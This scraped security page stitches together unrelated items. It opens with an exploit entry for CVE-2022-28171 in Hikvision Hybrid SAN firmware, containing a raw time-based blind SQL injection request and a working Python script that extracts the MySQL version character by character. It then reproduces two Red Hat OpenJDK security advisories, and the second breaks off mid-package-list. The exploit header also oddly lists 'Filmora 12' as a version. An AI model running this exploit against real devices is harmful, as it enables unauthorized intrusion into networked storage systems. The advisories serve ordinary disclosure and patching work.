    # Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution# Date: 16  July 2023# Exploit Author: Thurein Soe# CVE : CVE-2022-28171# Vendor Homepage: https://www.hikvision.com# Software Link: N/A# Refence Link: https://cve.report/CVE-2022-28171# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s'''Vendor Description:Hikvision is a world-leading surveillance manufacturer and supplier ofvideo surveillance and Internet of Things (IoT) equipment for civilian andmilitary purposes.Some Hikvision Hybrid SAN products were vulnerable to multiple remote codeexecution vulnerabilities such as command injection, Blind SQL injection,HTTP request smuggling, and reflected cross-site scripting.This resulted in remote code execution that allows an adversary to executearbitrary operating system commands and more. However, an adversary must beon the same network to leverage this vulnerability to execute arbitrarycommands.Vulnerability description:A manual test confirmed that The download type parameter was vulnerable toBlind SQL injection.I created a Python script to automate and enumerate SQLversions as the Application was behind the firewall and block all therequests from SQLmap.Request Body:GET/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'HTTP/1.1Host: X.X.X.X.12:2004Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36Connection: closePOC:'''import requestsimport timeurl = "http://X.X.X.X:2004/web/log/dynamic_log.php"# Function to check if the response time is greater than the specified delaydef is_response_time_delayed(response_time, delay):    return response_time >= delay# Function to perform blind SQL injection and check the response timedef perform_blind_sql_injection(payload):    proxies = {        'http': 'http://localhost:8080',        'https': 'http://localhost:8080',    }    params = {        'target': 'makeMaintainLog',        'downloadtype': payload    }    headers = {        'Accept-Encoding': 'gzip, deflate',        'Accept': '*/*',        'Accept-Language': 'en',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',        'Connection': 'close'    }    start_time = time.time()    response = requests.get(url, headers=headers, params=params,proxies=proxies)    end_time = time.time()    response_time = end_time - start_time    return is_response_time_delayed(response_time, 20)# Enumerate the MySQL versiondef enumerate_mysql_version():    version_Name = ''    sleep_time = 10  # Sleep time is 10 seconds    payloads = [        f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},SLEEP({sleep_time}), 0))-- -"        for i in range(1, 11)        for mid in range(256)    ]    for payload in payloads:        if perform_blind_sql_injection(payload):            mid = payload.split("=")[-1].split(",")[0]            version_Name += chr(int(mid))    return version_Name# Enumeration is completedversion_Name = enumerate_mysql_version()print("MySQL version is:", version_Name)

Hikvision Hybrid SAN Ds-a71024 SQL Injection

Red Hat Security Advisory 2023-4175-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit. Issues addressed include denial of service and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-11-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:4175-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4175  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22006 CVE-2023-22036 CVE-2023-22041   
                   CVE-2023-22045 CVE-2023-22049 CVE-2023-25193   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: ZIP file parsing infinite loop (8302483) (CVE-2023-22036)

* OpenJDK: weakness in AES implementation (8308682) (CVE-2023-22041)

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* harfbuzz: OpenJDK: O(n^2) growth via consecutive marks (CVE-2023-25193)

* OpenJDK: HTTP client insufficient file name validation (8302475)  
(CVE-2023-22006)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* A virtual machine crash was observed in JDK 11.0.19 when executing the  
GregorianCalender.computeTime() method (JDK-8307683). It was found  
that although the root cause of the crash is an old issue, a recent fix for  
a rare issue in the C2 compiler (JDK-8297951) made the crash much more  
likely. To mitigate this, the fix has been reverted in JDK 11.0.20 and will  
be reapplied once JDK-8307683 is resolved. (RHBZ#2222493)

* Prepare for the next quarterly OpenJDK upstream release (2023-07,  
11.0.20) [rhel-8] (BZ#2223101)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2167254 - CVE-2023-25193 harfbuzz: OpenJDK: O(n^2) growth via consecutive marks  
2221619 - OpenJDK: font processing denial of service vulnerability (8301998)  
2221626 - CVE-2023-22006 OpenJDK: HTTP client insufficient file name validation (8302475)  
2221634 - CVE-2023-22036 OpenJDK: ZIP file parsing infinite loop (8302483)  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)  
2222493 - SIGSEGV (duplicated predicate failed) in java.util.GregorianCalendar.computeTime() [rhel-8, openjdk-11] [rhel-8.8.0.z]  
2223101 - Prepare for the next quarterly OpenJDK upstream release (2023-07, 11.0.20) [rhel-8] [rhel-8.8.0.z]  
2223207 - CVE-2023-22041 OpenJDK: weakness in AES implementation (8308682)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
java-11-openjdk-11.0.20.0.8-2.el8.src.rpm

aarch64:  
java-11-openjdk-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-demo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-devel-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-headless-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-javadoc-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-jmods-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-src-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-static-libs-11.0.20.0.8-2.el8.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-demo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-devel-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-headless-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-jmods-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-src-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.20.0.8-2.el8.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-demo-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-devel-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-headless-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-javadoc-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-jmods-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-src-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-static-libs-11.0.20.0.8-2.el8.s390x.rpm

x86_64:  
java-11-openjdk-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-demo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-devel-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-headless-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-javadoc-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-jmods-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-src-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-static-libs-11.0.20.0.8-2.el8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.20.0.8-2.el8.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.20.0.8-2.el8.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.20.0.8-2.el8.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.20.0.8-2.el8.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-slowdebug-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.20.0.8-2.el8.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.20.0.8-2.el8.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-debugsource-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.20.0.8-2.el8.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.20.0.8-2.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22006  
https://access.redhat.com/security/cve/CVE-2023-22036  
https://access.redhat.com/security/cve/CVE-2023-22041  
https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/cve/CVE-2023-25193  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTHwAAoJENzjgjWX9erE3sMP/1X3KwhjvSrD4kF2ZLnFb5y3  
4SS+XzZ1L8vknFIVTDzVuOb5X0jAVWS26GOKBcy2CUry1V/VvRkEzwMAVCbymGUo  
S5HVbLzGkbnfLx4a4EPl5JfTqywXDzzXFZsX3qOPpujEYRSwEmgGSuRtV75hpeIP  
7GJBM2dP+gMXe186cFL7NarJHYgZ6+yoTVn4vK1uSeGSx+BbMHAh0tn+2xoAjIyw  
CYv+zgyCD5DHrjIv6cIkUIAk/0aWOxUlpmC/GZ45ls7t8KInN1XuMCLiC/IbGZDI  
zqCtA7OJcVADL5uoWFNhP6RLMPsyV+PCX+FV7DUiiBaUVrfv4RX4YXaR2KbgIAHY  
r9vTK/EDlWu8iz43/V7Mn7NOzwkFHsErsNGK4ghJmXtaoEpX8VyF0WuK+roO2X/Z  
LGLpzULm+55jq6B5b6KRlcRe9nMeo5+iZwtW+pWgzoSFf3E9YmhgdCyC4yV4wyNY  
+Erz5q4E1u9PIbMOhe8ylxdapu1YOqkaoJDd2Gypz8Yy14zHlAnxzf6Q+W5m0khT  
uTYXjWAzExlT8zLVbutM/MhwRXmV+NbJl9z23+bvR/IHhCSGNx3j/xSU9IQFEck0  
JKGo0jkUlVPAccHhCWIBVDHvf4w0zkQBkFw2JuAVtkv+2dnxkJU840B6rf03Zamg  
zwipPhd24qLwhvGauKIl  
=kYKT  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4175-01

Red Hat Security Advisory 2023-4176-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Issues addressed include an integer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:4176-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4176  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22045 CVE-2023-22049   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Prepare for the next quarterly OpenJDK upstream release (2023-07, 8u382)  
[rhel-8] (BZ#2219727)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2219727 - Prepare for the next quarterly OpenJDK upstream release (2023-07, 8u382) [rhel-8] [rhel-8.8.0.z]  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
java-1.8.0-openjdk-1.8.0.382.b05-2.el8.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-2.el8.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.382.b05-2.el8.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-2.el8.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-2.el8.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.382.b05-2.el8.s390x.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-2.el8.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el8.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el8.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-2.el8.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el8.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-2.el8.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el8.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-2.el8.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el8.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-2.el8.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el8.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-2.el8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.382.b05-2.el8.aarch64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.382.b05-2.el8.aarch64.rpm

ppc64le:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.382.b05-2.el8.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.382.b05-2.el8.ppc64le.rpm  
